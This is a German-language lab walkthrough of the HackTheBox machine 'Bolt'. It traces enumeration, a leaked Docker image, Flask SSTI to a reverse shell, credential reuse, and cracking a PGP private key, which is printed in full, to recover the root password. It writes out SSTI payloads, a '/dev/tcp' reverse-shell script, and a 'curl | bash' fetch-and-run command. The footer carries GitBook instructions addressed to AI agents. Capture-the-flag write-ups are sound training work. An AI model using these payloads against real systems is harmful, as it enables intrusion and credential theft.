> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/writeups-ctf/hackthebox/linux-medium/bolt-hackthebox-writeup.md).

# Bolt HackTheBox Ausarbeitung

{% embed url="<https://app.hackthebox.com/machines/384>" %}

{% hint style="warning" %}
**Fähigkeiten:**

* Informationsleck
* Subdomain-Enumeration
* SSTI (Serverseitige Template-Injektion)
* Ausnutzen von PassBolt
* Ausnutzen von GPG
  {% endhint %}

## Aufklärung

**Einrichtung des Arbeitsbereichs:**

Richten Sie den Arbeitsbereich ein, indem Sie drei Ordner erstellen, um wichtige Inhalte, Exploits und Nmap-Aufklärungsergebnisse zu speichern.

<figure><img src="/files/50ed8a92afb624c3c98bf0a79e496fbcec217331" alt="" width="563"><figcaption></figcaption></figure>

**VPN-Verbindung prüfen**

Prüfen Sie die VPN-Verbindung, um eine stabile Kommunikation mit dem Zielsystem sicherzustellen.

<figure><img src="/files/482d98a65ea140725de27eb391f6538401c776cd" alt="" width="563"><figcaption></figcaption></figure>

**Offene-Ports-Ermittlung mit Nmap:**

Erfassen Sie offene Ports und exportieren Sie die Ergebnisse in die Datei "allPorts" im Nmap-Verzeichnis:

```bash
nmap -p- --open -sS -Pn -n --min-rate 5000 -vvv 10.10.11.114 -oG allPorts
```

<figure><img src="/files/8b3ffe486ec1f52bab46a72b4651e3598f4ae4d4" alt=""><figcaption></figcaption></figure>

**Analyse offener Ports mit extractPorts:**

Verwende die Funktion extractPorts, um offene Ports in einem kompakten Format anzuzeigen und sie in die Zwischenablage zu kopieren (22,80,443)

<figure><img src="/files/7eca36268ebf77deb826c4f4551a49932785aa81" alt="" width="563"><figcaption></figcaption></figure>

**Port- und Versionsscan mit Nmap:**

Verwenden Sie Nmap, um die Service-Versionen zu scannen und die Ausgabe in der Datei "targeted" zu speichern:

```bash
nmap -sCV -p22,80,443 10.10.11.114 -oN targeted
```

<figure><img src="/files/0d369bde31aa27311cacb13a0b403a1e50bc8b44" alt=""><figcaption></figcaption></figure>

Um Domänennamen mittels DNS in IP-Adressen aufzulösen, tragen wir den mit der IP-Adresse verknüpften Domänennamen in die `/etc/hosts` vorhandenen Benutzern.

<figure><img src="/files/c96432a3ec8579fe236634e18fa2bdc6004b94e4" alt="" width="563"><figcaption></figcaption></figure>

### Port 80

<figure><img src="/files/e553954eccb7d3eadda607f9f3602041d41f530d" alt=""><figcaption></figcaption></figure>

Wir versuchen, ein Konto zu erstellen, erhalten aber einen "Internal Server Error".

<figure><img src="/files/ef17de762d6cad481e6163fc1c16b1f8bc5deb0f" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3626662ed8ec0cc8d4ff31cc92774b3ae6d1ba6a" alt=""><figcaption></figcaption></figure>

**Liste möglicher Benutzer:**

* Joseph Garth
* Bonnie Green
* Jose Leos

<figure><img src="/files/7ea42fc11f7d89e17916673214d7dcecbc092df2" alt=""><figcaption></figcaption></figure>

Uns wird angeboten, ein `.tar` Docker-Image, einschließlich eines grundlegenden Web-Pakets, um ein Projekt mit elegantem Design zu starten.

<figure><img src="/files/04ca93ed84d40350125c32cbb1449f8ff24e0db2" alt=""><figcaption></figcaption></figure>

**Verzeichnissuche:**

Wir führen eine Verzeichnissuche mit `gobuster`:

```bash
gobuster dir -u http://bolt.htb  -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
```

Es wurde nichts Interessantes gefunden.

<figure><img src="/files/ec2c19eead50e86a226c9087aa4e9356e4a35d8b" alt=""><figcaption></figcaption></figure>

**Subdomain-Suche:**

Wir suchen mit `gobuster`:

```bash
gobuster vhost -u http://bolt.htb  --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
```

Gefundene Subdomains:

* `demo.bolt.htb`
* `mail.bolt.htb`

<figure><img src="/files/1c95f24d0016268b62c32c327051748586ea3604" alt=""><figcaption></figcaption></figure>

Wir fügen sie dem `/etc/hosts` vorhandenen Benutzern.

<figure><img src="/files/194fae9ca4d04cbf1c18ffbd2b7b81d8196fc11e" alt="" width="563"><figcaption></figcaption></figure>

**`http://mail.blolt.htb`**

<figure><img src="/files/d7f825ff3840c7e99db5ff2a767c8a498aa7980e" alt="" width="563"><figcaption></figcaption></figure>

**`http://demo.bolt.htb:`**

<figure><img src="/files/871ca4ee18bc268661972bbb68d7d3263eb3a321" alt="" width="563"><figcaption></figcaption></figure>

### Informationsleck (image.tar)

Wir suchen in der Docker-Datei nach sensiblen Informationen `.tar` die Ordner mit der Datei enthält `json`, Datei `layer.tar` und Version.

<figure><img src="/files/ec1b4925ed16079f7c7b2674b0c7326a3ee3a493" alt=""><figcaption></figcaption></figure>

**Dateiextraktion:**

Wir extrahieren die Dateien aus `layer.tar` wie folgt:

```bash
mkdir extracted_layers
```

```bash
find . -name "layer.tar" -exec tar -xvf {} -C extracted_layers /;
```

<figure><img src="/files/5517efaabe2b4fb656345d8c7eb41e77ea5e67d6" alt=""><figcaption></figcaption></figure>

Wir öffnen die `db.sqlite3` Datenbank auf:

```sql
sqlite3 db.sqlite3 

.tables
SELECT * FROM user
```

Wir finden einen Benutzer `admin` mit einem gehashten Passwort:

* `id`: Einzigartige Benutzerkennung.
* `Benutzernamen`: Benutzername (`admin` in diesem Fall).
* `E-Mail`: Zugehörige E-Mail-Adresse (`admin@bolt.htb`).
* `Passwort`: Gehashtes Passwort (`$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.`).

<figure><img src="/files/b32854846fd0deb42028dd526831b600f0a0cc97" alt="" width="468"><figcaption></figcaption></figure>

Wir entschlüsseln das Passwort mit `john`:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

`admin:deadbolt`

<figure><img src="/files/25b0827e546614098053cd145e8fe7f8a7839307" alt="" width="563"><figcaption></figcaption></figure>

Wir melden uns im Admin-Panel an, finden aber nichts Interessantes außer, dass es Flask verwendet.

<figure><img src="/files/99f124785e1b9c85965390e3420e8fb43252af09" alt=""><figcaption></figcaption></figure>

**Suche nach Einladungscode:**

<figure><img src="/files/c82ab66fd5d63a8d9cbe1d798ec42b7a13bc98a0" alt="" width="529"><figcaption></figcaption></figure>

Wir suchen in den extrahierten Dateien nach dem Einladungscode:

```bash
grep -ri "invite_code" .
```

<figure><img src="/files/4b7f927339ff5ec3f665551dd3cbe0616bece144" alt=""><figcaption></figcaption></figure>

Eine Python-Datei enthält den Einladungscode:

`XNSS-HSJW-3NGU-8XTJ`

<figure><img src="/files/e60b52d637243f0e02b6819172a65894126b7b17" alt=""><figcaption></figcaption></figure>

Wir erstellen ein neues Benutzerkonto `jordan` mit Passwort `Jordan1234`, danach haben wir Zugriff auf den Posteingang und die Demo des Admin-Panels.

<figure><img src="/files/ab9fbf80859a61d1e325632601080630361ce5e2" alt="" width="563"><figcaption></figcaption></figure>

* `Benutzer: jordan`
* `Passwort: Jordan1234`

<figure><img src="/files/0cd2db7c97a0215b94d6eaf95d2c828d9ef76fed" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/6ce1cb17c24655792a006c9f27fabb875755fb43" alt=""><figcaption></figcaption></figure>

## Verwundbarkeit SSTI :

Beim Blick auf die Konfiguration stellen wir fest, dass beim Ändern unseres Konfigurationsnamens eine Bestätigungs-E-Mail gesendet wird. Dies könnte eine Gelegenheit für einen SSTI-Angriff sein.

<figure><img src="/files/8ace987b24a0f4e2b86e40e2cbd86ac5a5e51dc4" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fa2a86da271f26fb80a6cae74a8d247701a184ec" alt=""><figcaption></figcaption></figure>

Wir testen mit einem typischen Payload:

```bash
{{ 9*9 }}
```

Wenn das Ergebnis `81`ist, ist die Anwendung verwundbar.

<figure><img src="/files/1f2208149c678e8daf98bce7d7bd506c9054debb" alt=""><figcaption></figcaption></figure>

Wir bestätigen, dass die Anwendung verwundbar ist, und testen Befehlsinjektion mit einem Payload aus `payloadallthethings`:

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings>" %}

Bestell-ID:

```bash
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
```

<figure><img src="/files/683923bd162b6d7f76ad6411191f26e0dd7ad51e" alt=""><figcaption></figcaption></figure>

Wir führen erfolgreich eine Reverse Shell aus, indem wir auf Port 443 lauschen:

```bash
nc -nlvp 443
```

Wir erstellen einen `index.html` Datei mit folgendem Inhalt, um eine Reverse Shell auszuführen

```bash
#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.3/443 0>&1
```

Dann starten wir einen HTTP-Server mit Python:

```bash
python3 -m http.server 80
```

Wir senden den Payload mit `curl` um den Befehl abzurufen und auszuführen:

```bash
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl 10.10.14.3 | bash').read() }}
```

<figure><img src="/files/08d73365a75755acb64be88d26dfb23b568211f9" alt=""><figcaption></figcaption></figure>

**Terminal-Stabilisierung :**

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

#### Stabilisiere die Shell für komfortableres Arbeiten. <a href="#stabilize-the-shell" id="stabilize-the-shell"></a>

## Privilegieneskalation :

Als Benutzer `www-data`versuchen wir, unsere Privilegien zu erhöhen, um Root-Zugriff zu erhalten.

### Erste Enumerierung mit LinPEAS

Du hast LinPEAS verwendet, um potenzielle Schwachstellen im System zu identifizieren.

{% embed url="<https://github.com/peass-ng/PEASS-ng/releases>" %}

Ausgeführte Befehle:

```bash
python3 -m http.server 555
```

```bash
wget http://10.10.14.3:555/linpeas.sh
```

<figure><img src="/files/0def50c4ff521953daa56171813e0abe3730f29f" alt=""><figcaption></figcaption></figure>

LinPEAS offenbarte eine Konfigurationsdatei mit sensiblen Informationen:

`/etc/passbolt/passbolt.php`

* `host :localhost`
* `port : 3306`
* `username : passbolt`
* `password : rT2;jW7<eY8!dX8}pQ8%`
* `database : passboltdb`

<figure><img src="/files/bf08e9b7674066c815cd2496ef90f7ef0a900bfd" alt=""><figcaption></figcaption></figure>

### **Verbindung zur MySQL-Datenbank**

Verwendung der Informationen, um eine Verbindung zur Datenbank herzustellen:

```bash
mysql -h localhost -P 3306 -u passbolt -p 

rT2;jW7<eY8!dX8}pQ8%
```

#### **Analyse der Tabellen in der Datenbank**

<figure><img src="/files/94b378bfc0a0935c5b5994121764d91b61d1c279" alt=""><figcaption></figcaption></figure>

* **`users`**: Enthält Benutzer.

<table data-header-hidden data-full-width="true"><thead><tr><th width="125"></th><th width="112"></th><th width="124"></th><th width="101"></th><th width="109"></th><th width="110"></th><th></th></tr></thead><tbody><tr><td><code>id</code></td><td><code>role_id</code></td><td><code>Benutzernamen</code></td><td><code>aktive</code></td><td><code>deleted</code></td><td><code>created</code></td><td><code>modified</code></td></tr><tr><td><code>4e184ee6-e436-47fb-91c9-dccb57f250bc</code></td><td><code>1cfcd300-0664-407e-85e6-c11664a7d86c</code></td><td><code>eddie@bolt.htb</code></td><td>1</td><td>0</td><td>2021-02-25 21:42:50</td><td>2021-02-25 21:55:06</td></tr><tr><td><code>9d8a0452-53dc-4640-b3a7-9a3d86b0ff90</code></td><td><code>975b9a56-b1b1-453c-9362-c238a85dad76</code></td><td><code>clark@bolt.htb</code></td><td>1</td><td>0</td><td>2021-02-25 21:40:29</td><td>2021-02-25 21:42:32</td></tr></tbody></table>

* **`secrets`**: Verschlüsselte Nachrichten (möglicherweise später ausnutzbar).

<figure><img src="/files/abce6b90c05f36725ee6054bc37929d562f46d0d" alt=""><figcaption></figcaption></figure>

* **`gpgkeys`**: Enthält öffentliche Schlüssel (kann in bestimmten Szenarien verwendet werden).

<figure><img src="/files/8dbafaaea87ac3f7f31cb9d115be8038f4c742b3" alt=""><figcaption></figcaption></figure>

Versuch, sich zu verbinden mit `eddie`:

```bash
su eddie
```

* **Passwort**: `rT2;jW7<eY8!dX8}pQ8%`
* Zugriff auf Benutzer `eddie` erlangt

### Flagge user.txt :)

<figure><img src="/files/696a650d28300191d6c77f51157cc4ccda542ac1" alt="" width="563"><figcaption></figcaption></figure>

### Wiederverwendung von LinPEAS (Benutzer eddie)

Nachdem wir Zugriff auf den Benutzer `eddie`, verwenden wir erneut **LinPEAS** um das System nach möglichen SSH-Schlüsseln oder anderen nützlichen Hinweisen zu durchsuchen.

<figure><img src="/files/216a6892cc36611899cd28872d9d42b71053817a" alt=""><figcaption></figcaption></figure>

**Datei gefunden**: Eine Protokolldatei, die potenzielle SSH-Schlüssel enthält:

`/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log`

<figure><img src="/files/ea7898bc9d243bbeb07883c1adf4555282e26a72" alt=""><figcaption></figcaption></figure>

### Nachrichtenentschlüsselung mit GPG

**GPG-Privatschlüssel**: Wir verwenden das **GPG** Werkzeug, um den privaten Schlüssel zu importieren und zu versuchen, die verschlüsselte Nachricht in der `secrets` Tabelle in der `passboltdb` Datenbank.

```
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

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
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----
```

#### Extrahieren des Hashs des privaten Schlüssels

Um den privaten Schlüssel verwenden zu können, müssen wir zunächst seinen **Hash**. Wir verwenden das **gpg2john** Werkzeug, um den Hash des privaten Schlüssels zu extrahieren:

```bash
gpg2john private.key > hash
```

<figure><img src="/files/f7db510c8e988fbd8f6684f0268166ac707df32b" alt=""><figcaption></figcaption></figure>

**Brute-Force des Passworts des privaten Schlüssels mit `john`**

Wir verwenden **John the Ripper** um einen Wörterbuchangriff durchzuführen und das Passwort des privaten Schlüssels zu ermitteln. Wir verwenden die Wortliste **rockyou.txt** dafür:

```bash
john -wordlist=/usr/share/wordlists/rockyou.txt hash
```

**Passwort gefunden**: `merrychristmas`

<figure><img src="/files/58d64d23d2de12e5a079de43037e8ce99a2f66eb" alt=""><figcaption></figcaption></figure>

#### Importieren des privaten Schlüssels und Entschlüsseln der Nachricht

Wir importieren den privaten Schlüssel mit **gpg**

```bash
gpg --import private.key
```

<figure><img src="/files/5866a2bc6ea2cd122bcf5f2db5ef24d63e442642" alt=""><figcaption></figcaption></figure>

Dann entschlüsseln wir die verschlüsselte Nachricht (wahrscheinlich enthalten in der `message.txt` Datei, die aus der `secrets` Datenbank abgerufen wurde):

```bash
gpg --decrypt message.txt
```

**Root-Passwort gefunden**: `Z(2rmxsNW(Z?3=p/9s`

<figure><img src="/files/cf16b5dc9ee4e4e42bf02754f45a633418323a07" alt=""><figcaption></figcaption></figure>

### Flag root.txt

<figure><img src="/files/d7dc16e65f6121d9ab82ad4ddc5502a9410098ba" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/89b9026a06b8e843cd20f8f468d38f04dddc4b91" alt="" width="529"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/writeups-ctf/hackthebox/linux-medium/bolt-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
